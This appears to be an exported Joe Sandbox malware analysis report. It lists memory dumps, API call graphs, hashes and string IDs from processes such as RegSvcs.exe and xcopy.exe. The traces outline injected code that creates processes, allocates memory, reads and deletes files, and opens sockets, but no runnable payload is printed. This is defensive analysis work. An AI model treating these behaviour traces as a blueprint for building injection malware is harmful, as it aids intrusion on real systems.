                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                              • Instruction ID: 3354dbfbfe93dbc28cc3fcde93fd2548ad994f1f7d0d08ace59ac66fa87b8ae9
                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                              • Instruction Fuzzy Hash: 36C08838300A088FCF02CB2AC280F0833E8FB80300F0008C0EA00CBB22E228E802CA00
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              Strings
                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01054725
                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010546FC
                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01054742
                                                                                              • Execute=1, xrefs: 01054713
                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01054655
                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01054787
                                                                                              • ExecuteOptions, xrefs: 010546A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                              • API String ID: 0-484625025
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-$0$0
                                                                                              • API String ID: 1302938615-699404926
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$[$]:%u
                                                                                              • API String ID: 48624451-2819853543
                                                                                              Strings
                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010502E7
                                                                                              • RTL: Re-Waiting, xrefs: 0105031E
                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010502BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                              • API String ID: 0-2474120054
                                                                                              Strings
                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01057B7F
                                                                                              • RTL: Resource at %p, xrefs: 01057B8E
                                                                                              • RTL: Re-Waiting, xrefs: 01057BAC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 0-871070163
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0105728C
                                                                                              Strings
                                                                                              • RTL: Resource at %p, xrefs: 010572A3
                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01057294
                                                                                              • RTL: Re-Waiting, xrefs: 010572C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 885266447-605551621
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$]:%u
                                                                                              • API String ID: 48624451-3050659472
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-
                                                                                              • API String ID: 1302938615-2137968064
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $$@
                                                                                              • API String ID: 0-1194432280

                                                                                              Execution Graph

                                                                                              Execution Coverage:21.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:3
                                                                                              Total number of Limit Nodes:0
                                                                                              execution_graph 59 62863e7 60 62863ee socket 59->60 62 628649e 60->62

                                                                                              Callgraph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              • Opacity -> Relevance
                                                                                              • Disassembly available
                                                                                              callgraph 0 Function_062C1BDF 1 Function_06260003 2 Function_06286225 3 Function_062AB527 4 Function_062C1732 5 Function_062863E7 5->2

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 62863e7-62863ed 1 62863ee-62863fc 0->1 2 62863fd 1->2 3 6286425-6286429 1->3 2->3 4 62863ff-6286423 2->4 5 628642b-6286446 3->5 6 628647f-6286482 3->6 4->1 7 6286451-6286457 5->7 8 6286485-6286489 6->8 7->6 9 6286459-628647d 7->9 8->8 10 628648b-6286498 socket 8->10 9->7 12 628649e-62864a5 10->12 13 6286535-6286539 10->13 16 62864b0-62864b6 12->16 14 628653b-6286572 13->14 15 6286522 13->15 18 6286531-6286532 14->18 19 6286574-6286575 14->19 22 62864f6-62864fc 15->22 20 62864b8-62864dc 16->20 21 62864de-62864e2 16->21 18->13 20->16 24 6286524-628652d call 6286225 21->24 25 62864e4-62864eb 21->25 22->24 26 62864fe-6286520 22->26 24->18 25->22 26->15
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3915813020.0000000006260000.00000040.80000000.00040000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6260000_cJjnESPXORw.jbxd
                                                                                              Similarity
                                                                                              • API ID: socket
                                                                                              • String ID:
                                                                                              • API String ID: 98920635-0

                                                                                              Execution Graph

                                                                                              Execution Coverage:2.4%
                                                                                              Dynamic/Decrypted Code Coverage:4.2%
                                                                                              Signature Coverage:1.6%
                                                                                              Total number of Nodes:450
                                                                                              Total number of Limit Nodes:74
282b280 RtlFreeHeap 100985->100986 100986->100983 100988 2810716 100987->100988 100995 2829490 100988->100995 100992 2817f53 100991->100992 101000 2828750 100992->101000 100994 2817f7e 100994->100965 100996 28294ad 100995->100996 100999 3032c70 LdrInitializeThunk 100996->100999 100997 281071f 100997->100968 100999->100997 101001 28287c7 101000->101001 101002 282877b 101000->101002 101005 3032dd0 LdrInitializeThunk 101001->101005 101002->100994 101003 28287ec 101003->100994 101005->101003 101006 2815a10 101007 2817f40 LdrInitializeThunk 101006->101007 101008 2815a40 101006->101008 101007->101008 101010 2815a6c 101008->101010 101011 2817ec0 101008->101011 101013 2817f04 101011->101013 101012 2817f25 101012->101008 101013->101012 101018 2828520 101013->101018 101015 2817f15 101016 2817f31 101015->101016 101017 2829200 NtClose 101015->101017 101016->101008 101017->101012 101019 2828596 101018->101019 101021 282854b 101018->101021 101023 3034650 LdrInitializeThunk 101019->101023 101020 28285bb 101020->101015 101021->101015 101023->101020 101024 2816f90 101025 2816fac 101024->101025 101028 2816fff 101024->101028 101027 2829200 NtClose 101025->101027 101025->101028 101026 2817134 101031 2816fc7 101027->101031 101028->101026 101035 28163b0 NtClose LdrInitializeThunk LdrInitializeThunk 101028->101035 101030 281710e 101030->101026 101036 2816580 NtClose LdrInitializeThunk LdrInitializeThunk 101030->101036 101034 28163b0 NtClose LdrInitializeThunk LdrInitializeThunk 101031->101034 101034->101028 101035->101030 101036->101026 101042 2828f10 101043 2828fc0 101042->101043 101045 2828f3f 101042->101045 101044 2828fd6 NtCreateFile 101043->101044 101046 3032ad0 LdrInitializeThunk 101047 281865b 101049 281866b 101047->101049 101048 281861b 101049->101048 101051 2816f10 101049->101051 101052 2816f26 101051->101052 101054 2816f5f 101051->101054 101052->101054 101055 2816d80 LdrLoadDll 101052->101055 101054->101048 101055->101054 101056 2816c61 101057 2816c22 101056->101057 101059 
2816c3a 101056->101059 101060 2816c6c 101057->101060 101061 2817d70 101057->101061 101062 2817d8d 101061->101062 101068 2828940 101062->101068 101064 2817ddd 101065 2817de4 101064->101065 101073 2828a20 101064->101073 101065->101059 101067 2817e0d 101067->101059 101069 28289d4 101068->101069 101071 282896b 101068->101071 101078 3032f30 LdrInitializeThunk 101069->101078 101070 2828a0d 101070->101064 101071->101064 101074 2828ac9 101073->101074 101076 2828a4e 101073->101076 101079 3032d10 LdrInitializeThunk 101074->101079 101075 2828b0e 101075->101067 101076->101067 101078->101070 101079->101075 101080 281c420 101082 281c449 101080->101082 101081 281c54d 101082->101081 101083 281c4f3 FindFirstFileW 101082->101083 101083->101081 101085 281c50e 101083->101085 101084 281c534 FindNextFileW 101084->101085 101086 281c546 FindClose 101084->101086 101085->101084 101086->101081 101087 281f660 101088 281f6c4 101087->101088 101116 2816120 101088->101116 101090 281f7fe 101091 281f7f7 101091->101090 101123 2816230 101091->101123 101093 281f9a3 101094 281f87a 101094->101093 101095 281f9b2 101094->101095 101127 281f440 101094->101127 101096 2829200 NtClose 101095->101096 101098 281f9bc 101096->101098 101099 281f8b6 101099->101095 101100 281f8c1 101099->101100 101101 282b360 RtlAllocateHeap 101100->101101 101102 281f8ea 101101->101102 101103 281f8f3 101102->101103 101104 281f909 101102->101104 101105 2829200 NtClose 101103->101105 101136 281f330 CoInitialize 101104->101136 101107 281f8fd 101105->101107 101108 281f917 101139 2828ce0 101108->101139 101110 281f992 101111 2829200 NtClose 101110->101111 101112 281f99c 101111->101112 101113 282b280 RtlFreeHeap 101112->101113 101113->101093 101114 281f935 101114->101110 101115 2828ce0 LdrInitializeThunk 101114->101115 101115->101114 101118 2816153 101116->101118 101117 2816174 101117->101091 101118->101117 101143 2828d80 101118->101143 101120 2816197 101120->101117 101121 2829200 NtClose 101120->101121 101122 2816217 101121->101122 
101122->101091 101124 2816255 101123->101124 101148 2828b70 101124->101148 101128 281f45c 101127->101128 101129 28143c0 LdrLoadDll 101128->101129 101131 281f47a 101129->101131 101130 281f483 101130->101099 101131->101130 101132 28143c0 LdrLoadDll 101131->101132 101133 281f54e 101132->101133 101134 28143c0 LdrLoadDll 101133->101134 101135 281f5ab 101133->101135 101134->101135 101135->101099 101138 281f395 101136->101138 101137 281f42b CoUninitialize 101137->101108 101138->101137 101140 2828cfa 101139->101140 101153 3032ba0 LdrInitializeThunk 101140->101153 101141 2828d2a 101141->101114 101144 2828d9d 101143->101144 101147 3032ca0 LdrInitializeThunk 101144->101147 101145 2828dc9 101145->101120 101147->101145 101149 2828b8a 101148->101149 101152 3032c60 LdrInitializeThunk 101149->101152 101150 28162c9 101150->101094 101152->101150 101153->101141 101154 281ff60 101155 281ff7d 101154->101155 101156 28143c0 LdrLoadDll 101155->101156 101157 281ff9b 101156->101157 101163 2812fe3 101164 2817bc0 2 API calls 101163->101164 101165 2812ff3 101164->101165 101166 2829200 NtClose 101165->101166 101167 281300f 101165->101167 101166->101167 101173 2829160 101174 28291d0 101173->101174 101176 282918b 101173->101176 101175 28291e6 NtDeleteFile 101174->101175 101179 2819a2c 101180 282b360 RtlAllocateHeap 101179->101180 101181 2819a3b 101180->101181 101182 2819a60 101181->101182 101183 282b280 RtlFreeHeap 101181->101183 101183->101182 101184 2809d30 101185 2809d3f 101184->101185 101186 2809d80 101185->101186 101187 2809d6d CreateThread 101185->101187 101188 2810c70 101189 2810c8a 101188->101189 101190 28143c0 LdrLoadDll 101189->101190 101191 2810ca8 101190->101191 101192 2810ced 101191->101192 101193 2810cdc PostThreadMessageW 101191->101193 101193->101192 101194 2817170 101195 2817188 101194->101195 101197 28171e2 101194->101197 101195->101197 101198 281b0b0 101195->101198 101199 281b0d6 101198->101199 101200 281b306 101199->101200 101225 2829610 101199->101225 101200->101197 101202 
281b14c 101202->101200 101203 282c450 2 API calls 101202->101203 101204 281b168 101203->101204 101204->101200 101205 281b23f 101204->101205 101206 2828850 LdrInitializeThunk 101204->101206 101208 2815990 LdrInitializeThunk 101205->101208 101209 281b25e 101205->101209 101207 281b1ca 101206->101207 101207->101205 101211 281b1d3 101207->101211 101208->101209 101224 281b2ee 101209->101224 101232 28283c0 101209->101232 101210 281b227 101213 2817f40 LdrInitializeThunk 101210->101213 101211->101200 101211->101210 101212 281b205 101211->101212 101228 2815990 101211->101228 101247 2824600 LdrInitializeThunk 101212->101247 101218 281b235 101213->101218 101214 2817f40 LdrInitializeThunk 101219 281b2fc 101214->101219 101218->101197 101219->101197 101220 281b2c5 101237 2828470 101220->101237 101222 281b2df 101242 28285d0 101222->101242 101224->101214 101226 282962a 101225->101226 101227 282963b CreateProcessInternalW 101226->101227 101227->101202 101229 28159a2 101228->101229 101230 2828a20 LdrInitializeThunk 101229->101230 101231 28159cb 101230->101231 101231->101212 101233 2828436 101232->101233 101235 28283eb 101232->101235 101248 30339b0 LdrInitializeThunk 101233->101248 101234 282845b 101234->101220 101235->101220 101238 28284e6 101237->101238 101240 282849b 101237->101240 101249 3034340 LdrInitializeThunk 101238->101249 101239 282850b 101239->101222 101240->101222 101243 2828649 101242->101243 101245 28285fe 101242->101245 101250 3032fb0 LdrInitializeThunk 101243->101250 101244 282866e 101244->101224 101245->101224 101247->101210 101248->101234 101249->101239 101250->101244 101251 2825ef0 101252 2825f4a 101251->101252 101254 2825f57 101252->101254 101255 2823900 101252->101255 101256 282b200 NtAllocateVirtualMemory 101255->101256 101257 2823941 101256->101257 101258 28143c0 LdrLoadDll 101257->101258 101260 2823a4e 101257->101260 101261 2823987 101258->101261 101259 28239d0 Sleep 101259->101261 101260->101254 101261->101259 101261->101260 101263 28121f4 101264 2812195 
101263->101264 101265 28121ff 101263->101265 101266 2828850 LdrInitializeThunk 101264->101266 101267 28121a6 101266->101267 101270 28292a0 101267->101270 101269 28121bb 101271 282932b 101270->101271 101272 28292ce 101270->101272 101275 3032e80 LdrInitializeThunk 101271->101275 101272->101269 101273 282935c 101273->101269 101275->101273 101276 281263a 101277 2812649 101276->101277 101278 2816120 2 API calls 101277->101278 101279 2812669 101277->101279 101278->101279
                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(CB305BC4,?,?,?,?,?,?,?,?), ref: 0282914F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 18c2de097d6e05e9e2e73fb66ac8d9fe77a9c69f219f1cb552d884d3b4e729a8
                                                                                              • Instruction ID: 9b91965627ac709701b7e7512e50f7b89cc8f941308ad4c46af27c4639466f84
                                                                                              • Opcode Fuzzy Hash: 18c2de097d6e05e9e2e73fb66ac8d9fe77a9c69f219f1cb552d884d3b4e729a8
                                                                                              • Instruction Fuzzy Hash: FD31E8B9A00248AFDB14DF98D880EDFB7B9EF88714F108209FD18A7244D770A955CFA5
                                                                                              APIs
                                                                                              • NtAllocateVirtualMemory.NTDLL(CB305BC4,?,02827E3F,00000000,00000004,00003000,?,?,?,?,?,02827E3F,02811C5E,?,?,0282B22E), ref: 02829434
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateMemoryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2167126740-0
                                                                                              • Opcode ID: 4d2451a9c57527e0122989cabbfb239a27f69cac0bf3d2dd571e81182f957e11
                                                                                              • Instruction ID: 15097c12ea4e532cbd01a37624b32e6a811be680d9750dc80c25dc3dd1940be7
                                                                                              • Opcode Fuzzy Hash: 4d2451a9c57527e0122989cabbfb239a27f69cac0bf3d2dd571e81182f957e11
                                                                                              • Instruction Fuzzy Hash: B62139B9A00248ABDB14DF98DC81EEFB7B9EF88714F008109FD08A7244D770A9558BA5
                                                                                              APIs
                                                                                              • NtDeleteFile.NTDLL(CB305BC4), ref: 028291EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: 1caad6521f8bc669637c5c3099c0ef8c18523233f39a2b5e644aac288f79a86a
                                                                                              • Instruction ID: 73c0c8077ace039a2f8c9ca60909119b1d6fd007e20369c3eaf2668cbe1cbdd8
                                                                                              • Opcode Fuzzy Hash: 1caad6521f8bc669637c5c3099c0ef8c18523233f39a2b5e644aac288f79a86a
                                                                                              • Instruction Fuzzy Hash: 5D11C639A002187FD610EB98DC41FEFB76DDF85714F408149F918AB284D7B079458BB6
                                                                                              APIs
                                                                                              • NtClose.NTDLL(02821611,?,00000000,?,?,02821611,?), ref: 02829237
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: 7bd9bd1e91111e5752535fee6cb94bf5935f8f766f3a5d0022e3f4c7842bf860
                                                                                              • Instruction ID: ff33e7a1ef3294ea6e19da61ec2291eed125fd6ce8ba88005d5d54a0bfc15d6f
                                                                                              • Opcode Fuzzy Hash: 7bd9bd1e91111e5752535fee6cb94bf5935f8f766f3a5d0022e3f4c7842bf860
                                                                                              • Instruction Fuzzy Hash: 4BE08C3A2006187BD260EA5ECC40FEB77ADDFC5B24F418025FA0CA7241CA70B9058BF5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 713a854d270595aa0929f2f0456f325b3d752d80e28426db1a0b4f2b44cc3865
                                                                                              • Instruction ID: 8b458dd239f53c4911bdfc0e32cf51ca9153ebb6acbbd52a5ff7753fcc797b58
                                                                                              • Opcode Fuzzy Hash: 713a854d270595aa0929f2f0456f325b3d752d80e28426db1a0b4f2b44cc3865
                                                                                              • Instruction Fuzzy Hash: 4790027160680412A140B1588884546404597E0301B55C421E0424554C8B558B665361
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 7240d378744ca2106d2908c7b51d655bba393e3c5cee55f185d3f79656d6573c
                                                                                              • Instruction ID: 783185bea67080233d216911f4ffd9879333236556d71ff6cc2aa96015e9820f
                                                                                              • Opcode Fuzzy Hash: 7240d378744ca2106d2908c7b51d655bba393e3c5cee55f185d3f79656d6573c
                                                                                              • Instruction Fuzzy Hash: E89002A1602504425140B1588804406604597E1301395C525A0554560C87598A659369
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 88e980c6b16214b86f873bd31af3ec1f3c5dbfb2231c9cc6a540c722160d5c4c
                                                                                              • Instruction ID: 0c516a29f5ad72aa9556b9e6f96abe85018272895f768a50b51b3c0f18bb1082
                                                                                              • Opcode Fuzzy Hash: 88e980c6b16214b86f873bd31af3ec1f3c5dbfb2231c9cc6a540c722160d5c4c
                                                                                              • Instruction Fuzzy Hash: 109002A1203404035105B1588414616404A87E0201B55C431E1014590DC6668AA16225
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: bdd034d6efb0fc8ec242643db197debb79692bf4ffa45f37cd2efad90312bba5
                                                                                              • Instruction ID: fa1dd6ab01b4986a56546a4edd638ef64cf5f35bdc66d6502c42edfce31d8cd8
                                                                                              • Opcode Fuzzy Hash: bdd034d6efb0fc8ec242643db197debb79692bf4ffa45f37cd2efad90312bba5
                                                                                              • Instruction Fuzzy Hash: 8790027160640C02E150B1588414746004587D0301F55C421A0024654D87968B6577A1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 0591524416758727bb630694e9c9109f21221b55570053ce86ef85c742008e1e
                                                                                              • Instruction ID: e33eda76f7ffd8ce495fe1e122ed623369aaa463a0f389e53bc82c75c887f526
                                                                                              • Opcode Fuzzy Hash: 0591524416758727bb630694e9c9109f21221b55570053ce86ef85c742008e1e
                                                                                              • Instruction Fuzzy Hash: A790027120644C42E140B1588404A46005587D0305F55C421A0064694D97668F65B761
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 91803be361a284a823c49015fceed77d831825acfd90d5391f0265d04e5a99dd
